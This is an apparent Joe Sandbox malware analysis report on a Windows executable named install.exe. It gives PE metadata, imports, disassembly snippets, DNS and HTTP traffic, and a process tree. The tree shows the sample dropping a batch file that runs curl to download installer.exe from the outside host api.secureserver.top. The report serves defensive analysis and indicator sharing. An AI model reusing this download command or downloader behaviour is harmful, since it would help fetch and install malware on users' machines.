Reputation:	low
Preview:	Unknow Ip

\Device\Null

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	399
Entropy (8bit):	2.991530018216461
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeC3/8UniegCSgOgc4SaivIdxFFaSaivIdy:Vz6ykymUePbnc9c4SCdx/aSCdy
MD5:	E3AFBF5FC6807BFD8C76906D27C3B1AE
SHA1:	D927CC2803F1A9C0C3F635EF87DF1DAFC94AC064
SHA-256:	D40F46530DCD9A8DEA89FE002E07367701CC8666291C298FE266F21FA94BA964
SHA-512:	F9FA37CE2B24487E779FDA48537ECCA84233B809C11B30A346A1EE52E048521020CE94C62D63C1DD1E964F9949CAB1E2A2D941EF10AA6C98E2B0FDC36AC3C2EB
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 9 0 9 0 0 8 0 --:--:-- 0:00:01 --:--:-- 8.100 9 0 9 0 0 8 0 --:--:-- 0:00:01 --:--:-- 8..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.6836112848958615
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	install.exe
File size:	91'136 bytes
MD5:	3e4d454632a75dfb3a024977190a3e22
SHA1:	10addb3b65ad03714f1b1f081ec75dea97a1c81e
SHA256:	ad134b16820dc49c200b7c2cfcae83e34ed2e3424484ffe47be8050521662471
SHA512:	58d82423c06741170803fbb70e8023255fe6d5a63cc2dec391063bd97e7169071bcf907436fd76f7253d13a4e93c3b91b31fd217995e1601be098b713eaa98c5
SSDEEP:	1536:D7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfDwJO0:f7DhdC6kzWypvaQ0FxyNTBfD8
TLSH:	1E936C41F3E102F7EAF2053100A6722F973663389764A8DBC75C2E529913AD5A63D3E9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....L...............0....@........................................................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5D40055D [Tue Jul 30 08:52:45 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2c5f2513605e48f2d8ea5440a870cb9e

Entrypoint Preview

Instruction
push 000000ACh
push 00000000h
push 00418068h
call 00007F4CB0DD44D1h
add esp, 0Ch
push 00000000h
call 00007F4CB0DD44CAh
mov dword ptr [0041806Ch], eax
push 00000000h
push 00001000h
push 00000000h
call 00007F4CB0DD44B7h
mov dword ptr [00418068h], eax
call 00007F4CB0DD4431h
mov eax, 0041707Ch
mov dword ptr [0041808Ch], eax
call 00007F4CB0DDD8F2h
call 00007F4CB0DDD65Ah
call 00007F4CB0DDA538h
call 00007F4CB0DD9DBCh
call 00007F4CB0DD984Fh
call 00007F4CB0DD95C9h
call 00007F4CB0DD8A6Dh
call 00007F4CB0DD81EDh
call 00007F4CB0DD47AFh
call 00007F4CB0DDC1B8h
call 00007F4CB0DDAC60h
mov edx, 0041702Eh
lea ecx, dword ptr [00418074h]
call 00007F4CB0DD4448h
push FFFFFFF5h
call 00007F4CB0DD4458h
mov dword ptr [00418094h], eax
mov eax, 00000200h
push eax
lea eax, dword ptr [00418110h]
push eax
xor eax, eax
push eax
push 00000015h
push 00000004h
call 00007F4CB0DD9812h
push dword ptr [004180F8h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1716c	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17470	0x23c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x387e	0x3a00	46da2c5018752470fd3127bf22d63b95	False	0.4595231681034483	data	5.529218938453912	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x5000	0xd962	0xda00	e1a026e66953c410d7f60b1f1e3c560f	False	0.5144244552752294	data	6.56248809649253	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x33a5	0x3400	a16842a34a5da6feda9533bb3e83c3c1	False	0.8049128605769231	data	7.111835561466389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x178c	0x1200	79bcecb4e4599c1e69827415f2abe078	False	0.4034288194444444	data	5.1018889079921905	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19000	0x5ac	0x600	1f52d3227bbbfd04c11e89197e137d47	False	0.6276041666666666	data	5.841645998960712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x1921c	0x10	ISO-8859 text, with no line terminators, with overstriking	1.5625
RT_RCDATA	0x1922c	0x107	data	1.0418250950570342
RT_RCDATA	0x19334	0xe	zlib compressed data	1.5714285714285714
RT_RCDATA	0x19344	0x1	very short file (no magic)	9.0
RT_MANIFEST	0x19348	0x263	XML 1.0 document, ASCII text	0.5319148936170213

Imports

DLL	Import
MSVCRT.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 16:33:04.779540062 CET	49706	80	192.168.2.5	104.21.48.1
Feb 19, 2025 16:33:04.784656048 CET	80	49706	104.21.48.1	192.168.2.5
Feb 19, 2025 16:33:04.784883022 CET	49706	80	192.168.2.5	104.21.48.1
Feb 19, 2025 16:33:04.784883022 CET	49706	80	192.168.2.5	104.21.48.1
Feb 19, 2025 16:33:04.789921045 CET	80	49706	104.21.48.1	192.168.2.5
Feb 19, 2025 16:33:05.739943027 CET	80	49706	104.21.48.1	192.168.2.5
Feb 19, 2025 16:33:05.739984989 CET	80	49706	104.21.48.1	192.168.2.5
Feb 19, 2025 16:33:05.740026951 CET	49706	80	192.168.2.5	104.21.48.1
Feb 19, 2025 16:33:05.749902964 CET	49706	80	192.168.2.5	104.21.48.1
Feb 19, 2025 16:33:05.755145073 CET	80	49706	104.21.48.1	192.168.2.5
Feb 19, 2025 16:33:05.755203962 CET	49706	80	192.168.2.5	104.21.48.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 16:33:04.630263090 CET	58066	53	192.168.2.5	1.1.1.1
Feb 19, 2025 16:33:04.773578882 CET	53	58066	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 19, 2025 16:33:04.630263090 CET	192.168.2.5	1.1.1.1	0x747d	Standard query (0)	api.secureserver.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 19, 2025 16:33:04.773578882 CET	1.1.1.1	192.168.2.5	0x747d	No error (0)	api.secureserver.top	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.secureserver.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.48.1	80	7380	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
Feb 19, 2025 16:33:04.784883022 CET	147	OUT	GET /api/files/winpleskdedicated/installer.exe?key=winpleskdedicated HTTP/1.1 Host: api.secureserver.top User-Agent: curl/7.83.1 Accept: /
Feb 19, 2025 16:33:05.739943027 CET	1236	IN	HTTP/1.1 403 Forbidden Date: Wed, 19 Feb 2025 15:33:05 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6InVkZ0lFcUN6NllaTXZ0VnhyTlwveUlnPT0iLCJ2YWx1ZSI6Inp2aWpWQjk5MnpyWnFDVkY3bU16MFdwSld6VEdDNVNrQUh0MDgyMExaZ1REY0JzbHloQTdKM2tkRzZZTXhDcXgiLCJtYWMiOiJhYTFhYmUzOTE5MjY0MWExMGQ5Y2ZjYTliODFhNDhhMTA0OGM4MTQ5OGM1ZTFmNGZiMDJiYzVmNWUwMzE0MTdjIn0%3D; expires=Wed, 19-Feb-2025 17:33:05 GMT; Max-Age=7200; path=/ Set-Cookie: laravel_session=eyJpdiI6IkcyNVl6YzJ0d1N6bjRKbUZwXC9ETGp3PT0iLCJ2YWx1ZSI6ImdpeXdOdFpUWnZ0YlU3cHpJZWJMejlSbUtoN3JEZ29OeG83XC9WMDRHeXZNRlJrdjdpNnpUb3FXSGZOazNYOU16IiwibWFjIjoiODQ2Nzg1MjIxZDM2ZDA0MTdlMjU3OTNmYmM5YTMzMjk5Zjc1Yzc0NWFhMzZjOGYyMzAyNGI5YTM4ZjE1OGY2ZiJ9; expires=Wed, 19-Feb-2025 17:33:05 GMT; Max-Age=7200; path=/; httponly Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSPUVxFDvYW21qAWSkgmCNtn%2BnXtNL3Hyh9e0wJ9BL59AJjT4x7tbQqKBsFeJi883iNN%2Fyu%2FqVX9ye2Mft15wO5i9XjA5W9PnO1WPyuOpu5R9Ibq49MP1aqgAhrsPa03HcP8B0t8rQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cl Data Raw: Data Ascii:
Feb 19, 2025 16:33:05.739984989 CET	293	IN	Data Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 31 34 37 35 30 33 33 36 38 32 65 32 33 36 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 Data Ascii: udflareCF-RAY: 91475033682e236b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2286&min_rtt=2286&rtt_var=1143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=147&delivery_rate=0&cwnd=179&unsent_bytes=0&cid

Target ID:	0
Start time:	10:33:03
Start date:	19/02/2025
Path:	C:\Users\user\Desktop\install.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\install.exe"
Imagebase:	0x400000
File size:	91'136 bytes
MD5 hash:	3E4D454632A75DFB3A024977190A3E22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:33:03
Start date:	19/02/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:33:03
Start date:	19/02/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat C:\Users\user\Desktop\install.exe"
Imagebase:	0x7ff6463a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:33:03
Start date:	19/02/2025
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -o installer.exe api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
Imagebase:	0x7ff7cd470000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02570000,00000000,?,?), ref: 0040E967

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E

Strings

GetLongPathNameW, xrefs: 0040AE06
Kernel32.DLL, xrefs: 0040ADF3

Memory Dump Source

Source File: 00000000.00000002.2091293518.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2091278520.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091381293.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091400909.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091416304.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_install.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
Opcode Fuzzy Hash: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD

Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395
memorypipesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00409A69
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
wcslen.MSVCRT ref: 00409C2A
wcslen.MSVCRT ref: 00409C38
HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
wcscpy.MSVCRT ref: 00409C6A
wcscat.MSVCRT ref: 00409C71
wcscat.MSVCRT ref: 00409C7C
wcscpy.MSVCRT ref: 00409C88
wcscat.MSVCRT ref: 00409CA3
wcscat.MSVCRT ref: 00409CB0
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
wcslen.MSVCRT ref: 00409E04
wcscpy.MSVCRT ref: 00409E2A
memset.MSVCRT ref: 00409E56
ShellExecuteExW.SHELL32 ref: 00409EB3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB

Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

HeapFree.KERNEL32(00000000,?), ref: 00409F37

Strings

$0A, xrefs: 00409C0E
x, xrefs: 00409DEC

Memory Dump Source

Source File: 00000000.00000002.2091293518.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2091278520.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091381293.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091400909.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091416304.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_install.jbxd

Similarity

API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
String ID: $0A$x
API String ID: 550696126-3693508903
Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A

Function 00401000 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502

Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB

Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,0000020

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report install.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F73F.tmp\F740.tmp\F741.bat

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\licmon\installer.exe

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
install.exe

Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395
memorypipesynchronizationCOMMON

Function 00401000 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108
memoryCOMMON